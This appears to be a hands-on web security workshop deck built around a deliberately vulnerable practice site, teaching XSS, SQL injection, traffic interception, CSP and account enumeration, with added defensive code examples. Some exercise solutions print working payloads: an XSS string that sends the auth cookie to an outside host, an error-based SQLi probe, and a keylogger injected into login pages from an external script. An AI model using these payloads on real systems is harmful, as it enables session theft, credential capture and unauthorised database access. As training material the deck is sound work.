Hack Yourself First Troy Hunt @troyhunt troyhunt.com [email protected].
We’re gonna turn you into lean, mean hacking machines!
Because if we don’t, these kids are going to hack you
Ryan Cleary, 20 (and his mum)
Jake Davies, 19 (and his mum)
Curtis Gervais, 16, awaiting trial (probably with his mum)
Who are we protecting our assets from?
(Chart: hacker competency plotted against hacker resources)
• Bored kids – pocket money
• Common thieves – can invest where ROI makes sense
• Super hackers – $10.8B per annum
Your Hacker Tools for Today
• A Wi-Fi connection
• A mobile device you can configure a proxy on
  – I have a few spares
• Google Chrome
  – Or another browser with good dev tools
• Fiddler – getfiddler.com
  – Or another HTTP proxy like charlesproxy.com
What we’ll be covering on day 1
Introduction – 30 mins – 09:00
Discovering risks via the browser – 30 mins – 09:30
Using an HTTP proxy – 30 mins – 10:00
Break – 15 mins – 10:30
XSS – 50 mins – 10:45
SQL injection part 1 – 55 mins – 11:35
Lunch – 1 hour – 12:30
Mobile APIs – 60 mins – 13:30
Content Security Policy – 50 mins – 14:30
Break – 15 mins – 15:20
Account Enumeration – 30 mins – 15:35
HTTPS – 55 mins – 16:05
Close – 17:00
Discovering risks via the browser
Exercise 1
Exercise 1 – Chrome developer tools
• Familiarise yourself with the dev tools
  – Elements, network, cookies, console, por… uh, incognito
• Create an account at hackyourselffirst.troyhunt.com
Hacker Challenge 1: Identify three security risks with the registration process
Using an HTTP proxy
Exercise 2
Exercise 2 – Using an HTTP proxy
• Familiarise yourself with Fiddler
  – Watch requests and their headers, review response body and headers, use the composer to reissue requests
Hacker Challenge 2: Use Fiddler to vote multiple times on 1 car with your ID
Reflected cross site scripting (XSS)
Exercise 3
Understanding XSS
The page echoes the query string straight into the markup:
<p>You searched for <%= Request.QueryString["q"] %></p>
A normal request:
mysite.com/?q=ferrari
<p>You searched for ferrari</p>
A request carrying script:
mysite.com/?q=<script>alert('Yay XSS!');</script>
<p>You searched for <script>alert('Yay XSS!');</script></p>
Some quick XSS tips
• Check the encoding context
  – You encode for HTML differently than for JavaScript
• Check the encoding consistency
  – Often it’s manual and some characters are not encoded
• Play with JavaScript to:
  – Manipulate the DOM, access cookies, load external resources
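The two tips above (encode per context, and watch for encoders that skip characters) are easiest to see side by side. The following is an added example, not code from the workshop or from hackyourselffirst.troyhunt.com: a search page that echoes the term into an HTML paragraph and into an inline JavaScript string, rendered with no encoding, with one minimal HTML encoder for both contexts, and with a proper encoder per context. The renderer, the encoders and the two check functions are my own; the payloads are the ones on the slides with the cookie destination replaced by a placeholder host.

```javascript
// Added example (not from the workshop slides): one search term, two
// output contexts, three encoding strategies. Payloads are the ones shown
// on the slides; "attacker.invalid" is a placeholder destination.

const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

// A minimal encoder of the kind the tips slide warns about: it handles the
// tag-breaking characters but leaves the single quote alone.
function encodeForHtmlMinimal(value) {
  return String(value).replace(/[&<>"]/g, (ch) => HTML_ESCAPES[ch]);
}

// Full HTML body/attribute encoder.
function encodeForHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// JavaScript string-literal encoder: every non-alphanumeric character becomes
// \xHH or \uHHHH, so neither a quote nor "</script>" can end the literal.
function encodeForJsString(value) {
  return String(value).replace(/[^A-Za-z0-9]/g, (ch) => {
    const code = ch.charCodeAt(0);
    return code < 0x100 ? "\\x" + code.toString(16).padStart(2, "0")
                        : "\\u" + code.toString(16).padStart(4, "0");
  });
}

const identity = (v) => String(v);

// The page echoes the term twice: once in the <p> from the slide and once
// into a script variable, as the exercise 3 search page does.
function renderSearchPage(q, htmlEncode = identity, jsEncode = identity) {
  return `<p>You searched for ${htmlEncode(q)}</p>\n` +
         `<script>var term = '${jsEncode(q)}';</script>`;
}

// Count single quotes that are not preceded by a backslash.
function unescapedQuoteCount(text) {
  let n = 0;
  for (let i = 0; i < text.length; i++) {
    if (text[i] === "\\") { i++; continue; }   // skip the escaped character
    if (text[i] === "'") n++;
  }
  return n;
}

// True when the term is still a single string literal: exactly the two
// delimiting quotes, so nothing inside it closed the literal early.
function termLiteralIsIntact(page) {
  const m = /<script>var term = (.*);<\/script>$/.exec(page);
  return m !== null && unescapedQuoteCount(m[1]) === 2;
}

// True when nothing in the paragraph context can open or close a tag.
function paragraphIsInert(page) {
  const body = page.slice(0, page.indexOf("</p>")).replace("<p>", "");
  return !/[<>]/.test(body);
}

// Payloads from the slides (exercise 3 destination replaced by a placeholder).
const HTML_PAYLOAD = "<script>alert('Yay XSS!');</script>";
const JS_PAYLOAD = "');document.location='http://attacker.invalid/?c='+document.cookie;//";
```

Run `renderSearchPage(JS_PAYLOAD, encodeForHtmlMinimal, encodeForHtmlMinimal)` and the paragraph is inert while the script literal is broken open: that is the "consistency" problem on the slide, an encoder applied everywhere that does not cover the characters the second context needs. Only the per-context pair (`encodeForHtml`, `encodeForJsString`) leaves both contexts intact for both payloads.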
Exercise 3 – XSS
• Establish the encoding practices on the search page
  – What’s encoded, what’s not, what contexts are encoding
• What can be accessed or manipulated in the DOM
Hacker Challenge 3: Create an XSS attack that sends the auth cookie to another site
Exercise 3 solution
http://hackyourselffirst.troyhunt.com/Search?searchTerm=');document.location='http://www.troyhunt.com/?c='%2bdocument.cookie;//
SQL injection (SQLi)
Exercise 4
Understanding SQLi
The query is built by concatenating the URL parameter onto the SQL:
var query = "SELECT * FROM Widget WHERE Id = ";
query += Request.Query["id"];
A normal request:
mysite.com/?id=1
SELECT * FROM Widget WHERE Id = 1
A request with a non-numeric value:
mysite.com/?id=foo
SELECT * FROM Widget WHERE Id = foo
Invalid column name 'foo'
Some quick SQLi tips
• Think of SQL commands which disclose structure
  – sys.tables, sys.columns, system commands
• Consider how you’d enumerate through records
  – Select top x rows asc then top 1 rows from that desc
• Write out how you think the query works internally
  – SELECT * FROM Supercar ORDER BY [URL param]
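The two query shapes on these slides, `WHERE Id = ` + id and `ORDER BY [URL param]`, need different fixes, because a value can be bound as a parameter but a column name cannot. The following is an added example, not code from the workshop or from the hackyourselffirst site: each slide query is reproduced as the vulnerable string concatenation beside a hardened builder. Table and column names come from the slides; the allowlist of sortable columns, the `@id` parameter (SQL Server syntax, to be bound by whatever data-access layer runs the query) and the validation rules are my own.

```javascript
// Added example (not from the workshop): the slide queries as vulnerable
// concatenation beside hardened builders. Column allowlist and validation
// rules are constructed for illustration.

// 1. WHERE clause: the slide's concatenation, kept as-is for comparison.
function widgetByIdUnsafe(rawId) {
  let query = "SELECT * FROM Widget WHERE Id = ";
  query += rawId;
  return query;                          // id=foo yields "... WHERE Id = foo"
}

// Hardened: validate the shape first, then hand the value to the driver as
// a parameter so it is never parsed as SQL.
function widgetByIdQuery(rawId) {
  if (!/^[1-9]\d{0,8}$/.test(String(rawId))) {
    throw new RangeError("id must be a positive integer");
  }
  return { sql: "SELECT * FROM Widget WHERE Id = @id", params: { id: Number(rawId) } };
}

// 2. ORDER BY: a column name cannot be a bound parameter, so the only safe
// option is an allowlist. Keys are lower-cased for lookup; values are the
// exact identifiers that go into the SQL.
const SUPERCAR_SORT_COLUMNS = new Map([
  ["id", "Id"], ["name", "Name"], ["cylinders", "Cylinders"], ["topspeed", "TopSpeed"],
]);

// Vulnerable: orderby=@@VERSION*1 lands in the statement, and the server's
// cast error reports the version (the exercise 4 solution).
function supercarOrderByUnsafe(orderBy) {
  return "SELECT * FROM Supercar ORDER BY " + orderBy;
}

// Hardened: only a known column, optionally followed by ASC/DESC, is used.
function supercarOrderBySafe(orderBy) {
  const m = /^([a-z]+)(?:\s+(asc|desc))?$/i.exec(String(orderBy).trim());
  const column = m ? SUPERCAR_SORT_COLUMNS.get(m[1].toLowerCase()) : undefined;
  if (!column) {
    // Unknown input gets the default ordering, not an exception whose
    // message would disclose how the query is built.
    return "SELECT * FROM Supercar ORDER BY [Id] ASC";
  }
  const direction = m[2] ? m[2].toUpperCase() : "ASC";
  return `SELECT * FROM Supercar ORDER BY [${column}] ${direction}`;
}
```

Note the two different failure behaviours: the `WHERE` builder rejects bad input loudly (a malformed id is a client error), while the `ORDER BY` builder falls back to a default silently, since the error text is exactly what the tips slide says an attacker reads to learn the query structure.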
Exercise 4 – SQLi
• Explore the database using error-based SQLi
  – Construct strings to disclose internal data
  – Cast things to invalid types to disclose via exceptions
Hacker Challenge 4: Discover the version of the DB
Exercise 4 solution
http://hackyourselffirst.troyhunt.com/Make/1?orderby=@@VERSION*1
Mobile APIs
Exercise 5
Understanding mobile APIs
Who are we protecting our APIs from?
(Diagram labels: Attacker, Attacker, HTTP(S))
Trusting the Fiddler root cert
http://ipv4.fiddler:8888
Some quick mobile API tips
• Look at the HTTP requests for sensitive data
  – Credentials, account info, PII
• Remove the proxy’s root cert and make HTTPS requests
  – Is cert validation actually enabled in the app?
• In your own apps:
  – Parameter tampering, auth bypass, direct object refs
Exercise 5 – Mobile APIs
• Proxy your device through Fiddler or Charles
  – Inspect the traffic of your apps
  – Perform normal activities and monitor requests
Hacker Challenge 5: Find three “things of interest” – doesn’t have to be security related
FiddlerScript
Exercise 6
Understanding FiddlerScript
• Highlight particular request / response patterns
• Modify requests or responses in transit
• Good representation of what can be done with intercepted traffic
• Also great for causing apps to “misbehave”!
Some quick FiddlerScript tips
• Make good use of the FiddlerScript CookBook
  – Google it – first result
• Wrap conditions around response parsing for better perf
  – Host name / path / content type / method
• Don’t forget to hit the “Save Script” button!
  – Plus debugging can be painful…
Exercise 6 – FiddlerScript
• Modify the traffic returned to your app
  – Identify request / response patterns of an app
  – Manipulate request / response to cause misbehaviour
Hacker Challenge 6: Proxy your mobile device and cause one of your apps to do something… “interesting”
Content Security Policy (CSP)
Exercise 7
Without a CSP
• Anything can be added to the page via a reflected XSS risk
• Anything can be added to the DOM downstream of the server
  – …and you have no idea when this one is happening!
With a CSP
• The browser will only load resources you white-list
  – Local resources
  – Remote resources
• Any violations can be reported
  – If you’re nervous, you can always just report and not block
Some quick CSP tips
• Create a white list of what should be allowed to run
• Start with nothing and see what breaks
  – In development!
• Use the report feature to track exceptions
  – You’ll learn some interesting things…
Exercise 7 – CSP
• Falafel needs help!
  – They have no CSP and they’re a financial institution!
  – We can add one ourselves in transit
Hacker Challenge 7: Write a CSP for a site and embed it using FiddlerScript
Injecting the CSP header
if (oSession.HostnameIs("www.americanexpress.com")) {
  oSession.oResponse.headers["Content-Security-Policy"] = …;
}
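Before a policy goes into that header it helps to check, resource by resource, what it will block, and whether it should start out as report-only as the earlier CSP slides suggest. The following is an added example in plain JavaScript (Node.js, not FiddlerScript), not code from the workshop: a small evaluator that parses a policy string, picks the directive governing a resource type (falling back to default-src), and decides whether a URL or an inline script is allowed from a given page. It covers `'self'`, `'none'`, `'unsafe-inline'`, scheme sources and host sources with wildcards and ports; nonces and hashes are not modelled. The policy, page and resource URLs are constructed for illustration.

```javascript
// Added example (not from the workshop): a minimal CSP source-list evaluator.
// Policy, page URL and resource URLs below are constructed.

function parseCsp(header) {
  const policy = {};
  for (const part of header.split(";")) {
    const [name, ...sources] = part.trim().split(/\s+/).filter(Boolean);
    if (name) policy[name.toLowerCase()] = sources;
  }
  return policy;
}

const DEFAULT_PORT = { "http:": "80", "https:": "443" };

// Does one source expression permit this URL, seen from pageUrl's origin?
function sourceMatches(source, url, pageUrl) {
  const u = new URL(url), page = new URL(pageUrl);
  if (source === "'self'") return u.origin === page.origin;
  if (source.startsWith("'")) return false;        // 'none', 'unsafe-inline', ...
  if (/^[a-z][a-z0-9+.-]*:$/i.test(source)) return u.protocol === source.toLowerCase();
  // host-source: [scheme://]host[:port][/path]; path matching is omitted here
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?([^/:]+)(?::(\d+|\*))?(?:\/.*)?$/i.exec(source);
  if (!m) return false;
  const [, scheme, host, port] = m;
  if (scheme) {
    if (u.protocol !== scheme.toLowerCase() + ":") return false;
  } else if (u.protocol !== page.protocol &&
             !(page.protocol === "http:" && u.protocol === "https:")) {
    return false;   // a schemeless host matches the page's scheme (or its https upgrade)
  }
  const h = host.toLowerCase();
  const hostOk = h === "*" || h === u.hostname ||
                 (h.startsWith("*.") && u.hostname.endsWith(h.slice(1)));
  if (!hostOk) return false;
  const urlPort = u.port || DEFAULT_PORT[u.protocol] || "";
  return !port || port === "*" || port === urlPort;
}

// The directive that governs a fetch, or default-src when it is absent;
// null means the policy does not restrict this resource type at all.
function governingSources(policy, directive) {
  return policy[directive] || policy["default-src"] || null;
}

function isAllowed(policy, directive, url, pageUrl) {
  const sources = governingSources(policy, directive);
  return sources === null || sources.some((s) => sourceMatches(s, url, pageUrl));
}

function inlineAllowed(policy, directive) {
  const sources = governingSources(policy, directive);
  return sources === null || sources.includes("'unsafe-inline'");
}

// Report-only first, enforce later: the header name is the only difference.
function cspHeader(policyString, reportOnly) {
  return {
    name: reportOnly ? "Content-Security-Policy-Report-Only" : "Content-Security-Policy",
    value: policyString,
  };
}

// Constructed policy and page for a check run.
const SAMPLE_POLICY =
  "default-src 'self'; script-src 'self' https://cdn.example.com; img-src https:; report-uri /csp-report";
const PAGE = "https://www.example.com/account";
```

A useful way to run it is to feed every URL from the site's network tab (the Fiddler capture from exercise 2 will do) through `isAllowed` against the candidate policy and list the ones that come back false; the `report-uri` entry in a report-only deployment gives the same list from real users, which is the "interesting things" the tips slide refers to.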
HTTPS
Exercise 8
Understanding HTTPS
Confidentiality – Integrity – Authenticity
Some quick HTTPS tips
• Consider everything sent over HTTP to be compromised
  – Sometimes that won’t matter… much
• Also look at HTTPS content embedded in untrusted pages
  – Iframes
  – Links to HTTPS
Exercise 8 – HTTPS
• You can’t trust insecure login forms!
  – The form can be manipulated in transit
  – Manipulate it to capture the “secure” credentials in transit
Hacker Challenge 8: Inject a JavaScript keylogger into an insecure login page using FiddlerScript
Injecting the keylogger
evilcyberhacker.com/keylogger.js
Set the “destination” JavaScript variable
Account enumeration
Exercise 9
Understanding account enumeration
Does [email protected] have an account? No
Does [email protected] have an account? No
Does [email protected] have an account? Yes
Some quick account enumeration tips
• There are usually multiple vectors for identifying the existence of an account
• There may or may not be anti-automation defence
  – And it may be inconsistent across vectors
• It may or may not even matter…
  – Very dependent on the nature
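"Multiple vectors" and "positive versus negative responses" can be turned into a check a site can run against itself. The following is an added example, not code from the workshop: two constructed vectors (password reset and registration) are each written twice, once in the leaky form that answers differently for known and unknown addresses and once in the form that answers identically and moves the difference into the e-mail that gets sent, and an audit function drives each vector with a known and an unknown address and reports which response fields differ. The user list, handlers and outbox are constructed stand-ins.

```javascript
// Added example (not from the workshop): compare a vector's responses for a
// known and an unknown account. Users, handlers and outbox are constructed.

const USERS = new Set(["alice@example.com"]);
const outbox = [];   // stand-in for the mail queue the safe handlers write to

// Leaky vectors: status code and message both reveal whether the account exists.
function resetLeaky(email) {
  return USERS.has(email)
    ? { status: 200, body: "Reset instructions have been emailed to you" }
    : { status: 404, body: "No account exists for that email address" };
}
function registerLeaky(email) {
  return USERS.has(email)
    ? { status: 409, body: "That email address is already registered" }
    : { status: 200, body: "Account created, check your email to verify it" };
}

// Hardened vectors: the HTTP response is identical in both cases; only the
// e-mail sent to the address (which only its owner can read) differs.
function resetSafe(email) {
  if (USERS.has(email)) outbox.push({ to: email, kind: "reset" });
  return { status: 200, body: "If that address is registered, reset instructions have been emailed to it" };
}
function registerSafe(email) {
  outbox.push({ to: email, kind: USERS.has(email) ? "already-registered" : "verify" });
  return { status: 200, body: "Check your email to continue" };
}

// Fields in which the known-account response differs from the unknown one.
function enumerationDifferences(handler, knownEmail, unknownEmail) {
  const a = handler(knownEmail), b = handler(unknownEmail);
  const diffs = [];
  for (const field of ["status", "body"]) {
    if (a[field] !== b[field]) diffs.push(field);
  }
  if (JSON.stringify(a.headers || {}) !== JSON.stringify(b.headers || {})) diffs.push("headers");
  return diffs;
}

// Run every vector and report per vector; an empty list means no signal.
function auditVectors(vectors, knownEmail, unknownEmail) {
  const report = {};
  for (const [name, handler] of Object.entries(vectors)) {
    report[name] = enumerationDifferences(handler, knownEmail, unknownEmail);
  }
  return report;
}
```

Identical bodies also remove the response-length signal; response timing is not compared here and needs separate attention, since a handler that only sends mail on the known-account path can still be slower on it. The audit is also the place to notice the tip about inconsistency: a site that fixed its login page but not its password-reset page shows up as one empty list and one non-empty one.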
Exercise 9 – Account enumeration
• Identify vectors for account enumeration
  – Think about how to “ask” the site about an account
  – Identify positive versus negative responses
Hacker Challenge 9: Identify 3 sites you use that disclose the presence of your account